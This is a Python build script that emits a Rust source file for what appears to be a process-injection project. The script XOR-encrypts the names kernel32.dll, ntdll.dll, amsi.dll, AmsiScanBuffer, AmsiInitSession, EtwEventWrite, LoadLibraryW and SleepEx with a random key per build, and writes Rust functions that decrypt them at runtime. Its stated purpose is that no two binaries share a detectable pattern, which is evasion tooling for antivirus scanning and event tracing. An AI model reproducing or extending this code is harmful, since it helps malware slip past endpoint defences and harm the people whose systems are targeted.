#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Generates per-build stealth decryption tables.
Each build gets a unique XOR key and unique encrypted byte arrays,
so no two binaries share the same pattern for DLL/export names.
"""

import random
import os

# XOR key range: 0x01-0xFF (never 0)
def random_xor_key():
    return random.randint(1, 255)

def xor_bytes(data: bytes, key: int) -> list:
    return [b ^ key for b in data]

def gen_rust_array(name: str, enc_bytes: list) -> str:
    hex_vals = ','.join(f'0x{b:02X}' for b in enc_bytes)
    return f"    static K_{name}: [u8; {len(enc_bytes)}] = [{hex_vals}];"

def generate_stealth_tables(output_path: str):
    """
    Generate stealth_tables.rs with:
    - Random XOR key
    - Encrypted DLL names: kernel32.dll, ntdll.dll, amsi.dll
    - Encrypted export names: SleepEx, EtwEventWrite, AmsiScanBuffer, AmsiInitSession, LoadLibraryW
    - Decrypt functions that use the key
    """
    xor_key = random_xor_key()

    # All strings to encrypt
    dll_names = {
        "kernel32_dll": b"kernel32.dll",
        "ntdll_dll": b"ntdll.dll",
        "amsi_dll": b"amsi.dll",
    }
    export_names = {
        "sleep_ex": b"SleepEx",
        "etw_event_write": b"EtwEventWrite",
        "amsi_scan_buffer": b"AmsiScanBuffer",
        "amsi_init_session": b"AmsiInitSession",
        "load_library_w": b"LoadLibraryW",
    }

    lines = []
    lines.append(f"// AUTO-GENERATED by stealth_gen.py — DO NOT EDIT")
    lines.append(f"// XOR key: 0x{xor_key:02X} (unique per build)")
    lines.append("")
    lines.append(f"const _STEALTH_XOR_KEY: u8 = 0x{xor_key:02X};")
    lines.append("")

    # Encrypted DLL names
    lines.append("// === Encrypted DLL names ===")
    dll_ids = {}
    for i, (name, data) in enumerate(dll_names.items()):
        enc = xor_bytes(data, xor_key)
        lines.append(gen_rust_array(f"DLL_{i}", enc))
        dll_ids[name] = i
    lines.append("")

    # Encrypted export names
    lines.append("// === Encrypted export names ===")
    export_ids = {}
    for i, (name, data) in enumerate(export_names.items()):
        enc = xor_bytes(data, xor_key)
        lines.append(gen_rust_array(f"EXP_{i}", enc))
        export_ids[name] = i
    lines.append("")

    # Generate the decrypt function for DLL names
    lines.append("/// Decrypt DLL name by ID (unique per build)")
    lines.append("#[allow(static_mut_refs)]")
    lines.append("pub fn stealth_dll_name(id: u8) -> &'static str {")
    lines.append("    unsafe {")
    lines.append("        match id {")
    for name, i in dll_ids.items():
        data = dll_names[name]
        size = len(data)
        lines.append(f"            {i} => {{")
        lines.append(f"                static mut V_{i}: [u8; {size}] = [0;{size}];")
        lines.append(f"                if V_{i}[0] == 0 {{ let mut j=0usize; while j<{size} {{ V_{i}[j]=K_DLL_{i}[j]^{xor_key:3}; j+=1; }} }}")
        lines.append(f"                core::str::from_utf8_unchecked(&V_{i})")
        lines.append("            }")
    lines.append("            _ => \"\",")
    lines.append("        }")
    lines.append("    }")
    lines.append("}")
    lines.append("")

    # Generate the decrypt function for export names
    lines.append("/// Decrypt export name by ID (unique per build)")
    lines.append("#[allow(static_mut_refs)]")
    lines.append("pub fn stealth_export_name(id: u8) -> &'static str {")
    lines.append("    unsafe {")
    lines.append("        match id {")
    for name, i in export_ids.items():
        data = export_names[name]
        size = len(data)
        lines.append(f"            {i} => {{")
        lines.append(f"                static mut V_{i}: [u8; {size}] = [0;{size}];")
        lines.append(f"                if V_{i}[0] == 0 {{ let mut j=0usize; while j<{size} {{ V_{i}[j]=K_EXP_{i}[j]^{xor_key:3}; j+=1; }} }}")
        lines.append(f"                core::str::from_utf8_unchecked(&V_{i})")
        lines.append("            }")
    lines.append("            _ => \"\",")
    lines.append("        }")
    lines.append("    }")
    lines.append("}")
    lines.append("")

    with open(output_path, 'w', encoding='utf-8') as f:
        f.write('\n'.join(lines))

    print(f"[+] Generated stealth_tables.rs ({os.path.getsize(output_path)} bytes, XOR key=0x{xor_key:02X})")
    return xor_key


if __name__ == "__main__":
    out = os.path.join(os.path.dirname(__file__), "..", "src", "inject", "src", "stealth_tables.rs")
    generate_stealth_tables(out)
